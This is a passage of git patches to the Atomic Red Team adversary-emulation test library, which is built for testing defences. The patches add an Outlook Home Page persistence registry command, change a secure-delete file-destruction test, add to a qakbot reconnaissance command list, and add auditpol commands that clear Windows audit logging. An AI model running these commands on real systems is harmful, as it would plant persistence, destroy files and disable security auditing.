techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 587975b9..2d66174d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -147,6 +147,7 @@ persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 036c16ce..01d6e9ed 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -359,6 +359,7 @@ persistence,T1078.003,Local Accounts,1,Create local account with admin privilige persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a5b8b9cf..5c7aced5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -299,7 +299,8 @@ - [T1137.002 Office Test](../../T1137.002/T1137.002.md) - Atomic Test #1: Office Apllication Startup Test Persistence [windows] - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) + - Atomic Test #1: Install Outlook Home Page Persistence [windows] - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index de725c5f..bb5efa35 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -659,7 +659,8 @@ - [T1137.002 Office Test](../../T1137.002/T1137.002.md) - Atomic Test #1: Office Apllication Startup Test Persistence [windows] - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) + - Atomic Test #1: Install Outlook Home Page Persistence [windows] - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 8e8dc254..0a1e5634 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -60,7 +60,7 @@ | | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | | | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | | | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | | | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | | | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 5b0f1086..16426f08 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -43,7 +43,7 @@ | | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index acdfb3e2..429e10c6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -14164,7 +14164,41 @@ persistence: x_mitre_platforms: - Windows - Office 365 - atomic_tests: [] + identifier: T1137.004 + atomic_tests: + - name: Install Outlook Home Page Persistence + auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e + description: | + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. + + Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + supported_platforms: + - windows + input_arguments: + url: + description: URL to Outlook Home Page containing the payload to execute + (can be local file:// or remote https://) + type: string + default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html + outlook_version: + description: Version of Outlook that is installed + type: string + default: 16.0 + outlook_folder: + description: Name of the Outlook folder to modify the homepage setting for + type: string + default: Inbox + executor: + name: command_prompt + elevation_required: false + command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /t REG_SZ /d #{url} /f + +' + cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /f + +' T1137.005: technique: external_references: diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md new file mode 100644 index 00000000..858ef875 --- /dev/null +++ b/atomics/T1137.004/T1137.004.md @@ -0,0 +1,49 @@ +# T1137.004 - Outlook Home Page +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) +
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) + +Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) +
+ +## Atomic Tests + +- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence) + + +
+ +## Atomic Test #1 - Install Outlook Home Page Persistence +This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. + +Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| +| outlook_version | Version of Outlook that is installed | string | 16.0| +| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f +``` + +#### Cleanup Commands: +```cmd +reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f +``` + + + + + +
From 34f4512f15d8c1e0166b2555c84831eac32f6e79 Mon Sep 17 00:00:00 2001 From: nobletrout Date: Fri, 12 Feb 2021 21:28:31 -0500 Subject: [PATCH 121/131] add caching of techniques. performance improvement. (#1391) --- atomic_red_team/attack_api.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/atomic_red_team/attack_api.rb b/atomic_red_team/attack_api.rb index f304b980..025f2553 100755 --- a/atomic_red_team/attack_api.rb +++ b/atomic_red_team/attack_api.rb @@ -75,9 +75,9 @@ class Attack techniques_by_tactic = Hash.new {|h, k| h[k] = []} techniques.each do |technique| next unless !technique['x_mitre_platforms'].nil? - next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform} + next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase =~ only_platform } - technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic| + technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic| techniques_by_tactic[tactic.fetch('phase_name')] << technique end end @@ -88,8 +88,10 @@ class Attack # Returns a list of all ATT&CK techniques # def techniques + return @techniques unless @techniques.nil? + # pull out the attack pattern objects - attack_stix.fetch("objects").select do |item| + @techniques = attack_stix.fetch("objects").select do |item| item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references| references['source_name'] == 'mitre-attack' end From ac04c34c4a3474c96882d39873df55455f9fd7eb Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 17 Feb 2021 18:19:00 +0000 Subject: [PATCH 122/131] Create file to delete as part of attack cmds (#1394) * Create file to delete as part of attack cmds * remove sample test --- atomics/T1485/T1485.yaml | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index c5100202..a6865915 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -27,14 +27,9 @@ atomic_tests: Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force Remove-Item $env:TEMP\SDelete.zip -Force - - description: | - The file to delete must exist at #{file_to_delete} - prereq_command: | - if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 } - get_prereq_command: | - New-Item #{file_to_delete} -Force | Out-Null executor: command: | + if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" name: powershell - name: macOS/Linux - Overwrite file with DD @@ -58,4 +53,3 @@ atomic_tests: command: | dd of=#{file_to_overwrite} if=#{overwrite_source} name: bash - From 95e6b573e718e40fd95cb615630e5f501af00b40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 17 Feb 2021 18:19:25 +0000 Subject: [PATCH 123/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 16 +++------------- atomics/T1485/T1485.md | 10 +--------- 2 files changed, 4 insertions(+), 22 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 429e10c6..649afe97 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42919,20 +42919,10 @@ impact: Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force Remove-Item $env:TEMP\SDelete.zip -Force - - description: 'The file to delete must exist at #{file_to_delete} - -' - prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 - } - -' - get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null - -' executor: - command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" - -' + command: | + if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } + Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" name: powershell - name: macOS/Linux - Overwrite file with DD auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 96c1ec81..fd7f276f 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -35,6 +35,7 @@ the powershell session along with other information about the file that was dele ```powershell +if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ``` @@ -53,15 +54,6 @@ Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force Remove-Item $env:TEMP\SDelete.zip -Force ``` -##### Description: The file to delete must exist at #{file_to_delete} -##### Check Prereq Commands: -```powershell -if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 } -``` -##### Get Prereq Commands: -```powershell -New-Item #{file_to_delete} -Force | Out-Null -``` From 7e974e12f2ba2358d8276df05da5320b17438d62 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Thu, 18 Feb 2021 09:52:00 -0600 Subject: [PATCH 124/131] Update qakbot.bat (#1393) Updated qakbot recon command list as reported by DFIR Reports: https://twitter.com/TheDFIRReport/status/1361331598344478727 Co-authored-by: Carrie Roberts --- atomics/T1016/src/qakbot.bat | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/T1016/src/qakbot.bat b/atomics/T1016/src/qakbot.bat index 3c02ae0b..4640e27c 100644 --- a/atomics/T1016/src/qakbot.bat +++ b/atomics/T1016/src/qakbot.bat @@ -4,6 +4,7 @@ arp -a ipconfig /all net view /all nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP +nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.DomainName net share route print netstat -nao From 645cb4edcd94f996baeae5609aef4bf9e900a2a2 Mon Sep 17 00:00:00 2001 From: McNulty <62604194+dglauche@users.noreply.github.com> Date: Thu, 18 Feb 2021 16:57:41 +0100 Subject: [PATCH 125/131] Update T1485.yaml (#1395) Let the file which will be deleted be more dynamic to allow users to define thier own using an input argument Co-authored-by: Carrie Roberts --- atomics/T1485/T1485.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index a6865915..8c372e6a 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -29,7 +29,7 @@ atomic_tests: Remove-Item $env:TEMP\SDelete.zip -Force executor: command: | - if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } + if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" name: powershell - name: macOS/Linux - Overwrite file with DD From 8b527927b5460f305fe2c728be027b1c37a6027d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 18 Feb 2021 15:58:10 +0000 Subject: [PATCH 126/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1485/T1485.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 649afe97..4ace7079 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42921,7 +42921,7 @@ impact: Remove-Item $env:TEMP\SDelete.zip -Force executor: command: | - if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } + if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" name: powershell - name: macOS/Linux - Overwrite file with DD diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index fd7f276f..a54cc8cb 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -35,7 +35,7 @@ the powershell session along with other information about the file that was dele ```powershell -if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force } +if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ``` From b1505aa7da980040ca8279072837bcc30ec2bc12 Mon Sep 17 00:00:00 2001 From: Alex Jackson <45179933+beattheprose@users.noreply.github.com> Date: Tue, 23 Feb 2021 20:33:15 -0600 Subject: [PATCH 127/131] Fix broken link (#1397) --- atomics/T1563.002/T1563.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1563.002/T1563.002.yaml b/atomics/T1563.002/T1563.002.yaml index 17f025e5..e3dd363a 100644 --- a/atomics/T1563.002/T1563.002.yaml +++ b/atomics/T1563.002/T1563.002.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: RDP hijacking auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 description: | - RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization + [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization supported_platforms: - windows input_arguments: From 9ccb1da33595a72c34b0b7cd395becc116889f10 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 24 Feb 2021 02:33:41 +0000 Subject: [PATCH 128/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 ++---- atomics/T1563.002/T1563.002.md | 2 +- 2 files changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4ace7079..728c1876 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -56383,11 +56383,9 @@ lateral-movement: atomic_tests: - name: RDP hijacking auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 - description: 'RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) + description: "[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an - organization - -' + organization\n" supported_platforms: - windows input_arguments: diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md index 67e1d2b3..7db2e09b 100644 --- a/atomics/T1563.002/T1563.002.md +++ b/atomics/T1563.002/T1563.002.md @@ -12,7 +12,7 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking -RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization +[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization **Supported Platforms:** Windows From b91312451f153cd00eba3d625a0218b969a1830b Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Sat, 27 Feb 2021 02:49:14 +1100 Subject: [PATCH 129/131] Added auditpol based config clear atomics (#1392) * Added auditpol based config clear atomics Included remove and clear switches for auditpol based logging impairment. * add warning statement Co-authored-by: Carrie Roberts --- atomics/T1562.002/T1562.002.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index c62376f4..2b27900e 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml @@ -6,6 +6,8 @@ atomic_tests: description: | Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. + + Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) supported_platforms: - windows input_arguments: @@ -60,3 +62,19 @@ atomic_tests: auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable name: command_prompt elevation_required: true +- name: 'Clear Windows Audit Policy Config' + auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + description: >- + Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. + supported_platforms: + - windows + executor: + command: | + auditpol /clear /y + auditpol /remove /allusers + cleanup_command: | + auditpol /set /category:"Account Logon" /success:enable /failure:enable + auditpol /set /category:"Detailed Tracking" /success:enable + auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable + name: command_prompt + elevation_required: true From 493c34372419d926534b522eafe9b71fb73a723e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 26 Feb 2021 15:49:35 +0000 Subject: [PATCH 130/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 90a73c08..b122c064 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -661,3 +661,4 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 7a91ad51-e6d2-4d43-9471-f26362f5738e +913c0e4e-4b37-4b78-ad0b-90e7b25010f6 From 07b61288d694892278bb3f4fbcd460f37f520090 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 26 Feb 2021 15:49:41 +0000 Subject: [PATCH 131/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + 